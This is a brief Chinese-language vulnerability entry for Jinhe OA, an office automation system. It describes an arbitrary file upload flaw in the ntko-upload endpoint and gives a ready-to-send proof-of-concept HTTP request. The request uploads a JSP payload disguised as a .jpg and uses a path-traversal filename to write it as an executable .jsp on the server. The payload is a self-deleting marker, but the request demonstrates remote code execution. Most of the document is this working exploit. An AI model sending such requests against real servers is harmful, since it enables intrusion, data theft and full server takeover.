漏洞描述
金和OA 是一款企业办公自动化系统。该漏洞存在于 /jc6/ntkoUpload/ntko-upload!upload.action 接口,攻击者可以通过上传特制的文件,在服务器上执行任意代码,可能导致敏感信息泄露、数据篡改及服务器被完全控制。
金和OA /jc6/ntkoUpload/ntko-upload!upload.action 文件上传漏洞
PoC代码
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 600
Content-Type: multipart/form-data; boundary=195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1334.101 Safari/537.36
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="upLoadFile"; filename="hjxaf.jpg"
Content-Type: image/jpeg
<% out.print(111*222);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="Submit"
upload
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955
Content-Disposition: form-data; name="filename"
../../../../upload/hjxaf.jsp
--195f850f295ca76329b90df79ba181a7bffe4d5f06996ad0075dc8b45955--